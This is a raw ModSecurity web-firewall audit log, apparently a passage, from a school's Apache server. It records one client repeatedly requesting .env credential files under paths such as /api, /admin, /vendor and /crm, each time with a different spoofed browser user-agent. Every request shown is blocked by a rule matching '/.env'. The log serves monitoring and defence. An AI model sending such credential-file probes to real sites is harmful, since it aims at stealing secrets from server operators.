1748254535740727 651; combined=246, p1=218, p2=0, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087e742e-Z-- --baf40e74-A-- [26/May/2025:17:15:36 +0700] aDQ_SFSmKJQK-9oQ9SRLSQAAAJE 103.236.140.4 54892 103.236.140.4 8181 --baf40e74-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 --baf40e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf40e74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254536335698 809 (- - -) Stopwatch2: 1748254536335698 809; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf40e74-Z-- --37d8a760-A-- [26/May/2025:17:15:36 +0700] aDQ_SHFOzWd_Ai7zJXWt2wAAABI 103.236.140.4 54898 103.236.140.4 8181 --37d8a760-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3) --37d8a760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d8a760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254536492144 863 (- - -) Stopwatch2: 1748254536492144 863; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d8a760-Z-- --44c6071c-A-- [26/May/2025:17:15:37 +0700] aDQ_SVSmKJQK-9oQ9SRLTQAAAIE 103.236.140.4 54950 103.236.140.4 8181 --44c6071c-B-- GET /admin/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MAARJS; rv:11.0) like Gecko --44c6071c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44c6071c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254537969249 1091 (- - -) Stopwatch2: 1748254537969249 1091; combined=386, p1=341, p2=0, p3=0, p4=0, p5=45, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44c6071c-Z-- --a12f5f74-A-- [26/May/2025:17:15:38 +0700] aDQ_Sv7lSIOiZEhmvSx5JwAAAEE 103.236.140.4 54978 103.236.140.4 8181 --a12f5f74-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 --a12f5f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a12f5f74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254538804149 925 (- - -) Stopwatch2: 1748254538804149 925; combined=370, p1=320, p2=0, p3=0, p4=0, p5=50, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a12f5f74-Z-- --59164573-A-- [26/May/2025:17:15:39 +0700] aDQ_S8-W3hHsdQpQwdTygQAAAMM 103.236.140.4 54998 103.236.140.4 8181 --59164573-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94 --59164573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59164573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254539230533 748 (- - -) Stopwatch2: 1748254539230533 748; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59164573-Z-- --8be73072-A-- [26/May/2025:17:15:39 +0700] aDQ_S8-W3hHsdQpQwdTyhgAAANE 103.236.140.4 55014 103.236.140.4 8181 --8be73072-B-- GET /app/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36 --8be73072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be73072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254539699628 820 (- - -) Stopwatch2: 1748254539699628 820; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be73072-Z-- --f37d0632-A-- [26/May/2025:17:15:41 +0700] aDQ_TXFOzWd_Ai7zJXWt5AAAAAY 103.236.140.4 55064 103.236.140.4 8181 --f37d0632-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C71 Safari/601.1 --f37d0632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f37d0632-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254541443219 779 (- - -) Stopwatch2: 1748254541443219 779; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f37d0632-Z-- --65d0c11d-A-- [26/May/2025:17:15:42 +0700] aDQ_Ts-W3hHsdQpQwdTykAAAANY 103.236.140.4 55104 103.236.140.4 8181 --65d0c11d-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; SM-G920V Build/NRD90M) --65d0c11d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65d0c11d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254542633809 900 (- - -) Stopwatch2: 1748254542633809 900; combined=376, p1=336, p2=0, p3=0, p4=0, p5=39, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65d0c11d-Z-- --1dca5879-A-- [26/May/2025:17:15:42 +0700] aDQ_TlSmKJQK-9oQ9SRLZQAAAI0 103.236.140.4 55112 103.236.140.4 8181 --1dca5879-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1) Opera 12.16 --1dca5879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dca5879-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254542815726 794 (- - -) Stopwatch2: 1748254542815726 794; combined=324, p1=270, p2=0, p3=0, p4=0, p5=54, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dca5879-Z-- --d5003461-A-- [26/May/2025:17:15:43 +0700] aDQ_T1SmKJQK-9oQ9SRLaQAAAJM 103.236.140.4 55124 103.236.140.4 8181 --d5003461-B-- GET /vendor/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; CPU OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C89 Safari/602.1 --d5003461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5003461-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254543132592 784 (- - -) Stopwatch2: 1748254543132592 784; combined=316, p1=275, p2=0, p3=0, p4=0, p5=40, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5003461-Z-- --d88c8109-A-- [26/May/2025:17:15:43 +0700] aDQ_T8-W3hHsdQpQwdTylgAAANQ 103.236.140.4 55146 103.236.140.4 8181 --d88c8109-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 --d88c8109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d88c8109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254543708839 668 (- - -) Stopwatch2: 1748254543708839 668; combined=253, p1=217, p2=0, p3=0, p4=0, p5=36, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d88c8109-Z-- --df9d9a2f-A-- [26/May/2025:17:15:45 +0700] aDQ_Uf7lSIOiZEhmvSx5QgAAAEQ 103.236.140.4 55194 103.236.140.4 8181 --df9d9a2f-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) WebClip/10601.6.11 Safari/10601.6.17 --df9d9a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df9d9a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254545300634 858 (- - -) Stopwatch2: 1748254545300634 858; combined=324, p1=288, p2=0, p3=0, p4=0, p5=36, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df9d9a2f-Z-- --3b78b328-A-- [26/May/2025:17:15:45 +0700] aDQ_Uf7lSIOiZEhmvSx5RwAAAFU 103.236.140.4 55218 103.236.140.4 8181 --3b78b328-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5 --3b78b328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b78b328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254545942431 767 (- - -) Stopwatch2: 1748254545942431 767; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b78b328-Z-- --a415913b-A-- [26/May/2025:17:15:46 +0700] aDQ_UlSmKJQK-9oQ9SRLeAAAAIg 103.236.140.4 55242 103.236.140.4 8181 --a415913b-B-- GET /crm/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10532 --a415913b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a415913b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254546591931 863 (- - -) Stopwatch2: 1748254546591931 863; combined=371, p1=334, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a415913b-Z-- --a0498372-A-- [26/May/2025:17:15:47 +0700] aDQ_U3FOzWd_Ai7zJXWt-wAAABg 103.236.140.4 55266 103.236.140.4 8181 --a0498372-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01; EIE10;ENUSWOL) --a0498372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0498372-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254547313970 844 (- - -) Stopwatch2: 1748254547313970 844; combined=340, p1=301, p2=0, p3=0, p4=0, p5=39, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0498372-Z-- --d3077d34-A-- [26/May/2025:17:15:47 +0700] aDQ_U8-W3hHsdQpQwdTyqAAAAMY 103.236.140.4 55282 103.236.140.4 8181 --d3077d34-B-- GET /.env.example HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.4; es-us; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --d3077d34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3077d34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254547792642 851 (- - -) Stopwatch2: 1748254547792642 851; combined=289, p1=245, p2=0, p3=0, p4=0, p5=44, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3077d34-Z-- --a4910307-A-- [26/May/2025:17:15:49 +0700] aDQ_Vc-W3hHsdQpQwdTytAAAAMo 103.236.140.4 55320 103.236.140.4 8181 --a4910307-B-- GET /.env.production HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-T113 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 --a4910307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4910307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254549121024 663 (- - -) Stopwatch2: 1748254549121024 663; combined=246, p1=217, p2=0, p3=0, p4=0, p5=28, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4910307-Z-- --be6f907f-A-- [26/May/2025:17:15:49 +0700] aDQ_Vf7lSIOiZEhmvSx5TQAAAE8 103.236.140.4 55326 103.236.140.4 8181 --be6f907f-B-- GET /.env.example HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 OPR/35.0.2066.82 --be6f907f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be6f907f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254549194101 659 (- - -) Stopwatch2: 1748254549194101 659; combined=296, p1=268, p2=0, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be6f907f-Z-- --e913181a-A-- [26/May/2025:17:15:51 +0700] aDQ_V8-W3hHsdQpQwdTyvwAAANc 103.236.140.4 55392 103.236.140.4 8181 --e913181a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.28) Gecko/20120306 AskTbSTC-SRS/3.13.1.18132 Firefox/3.6.28 (.NET CLR 3.5.30729) --e913181a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e913181a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254551398483 669 (- - -) Stopwatch2: 1748254551398483 669; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
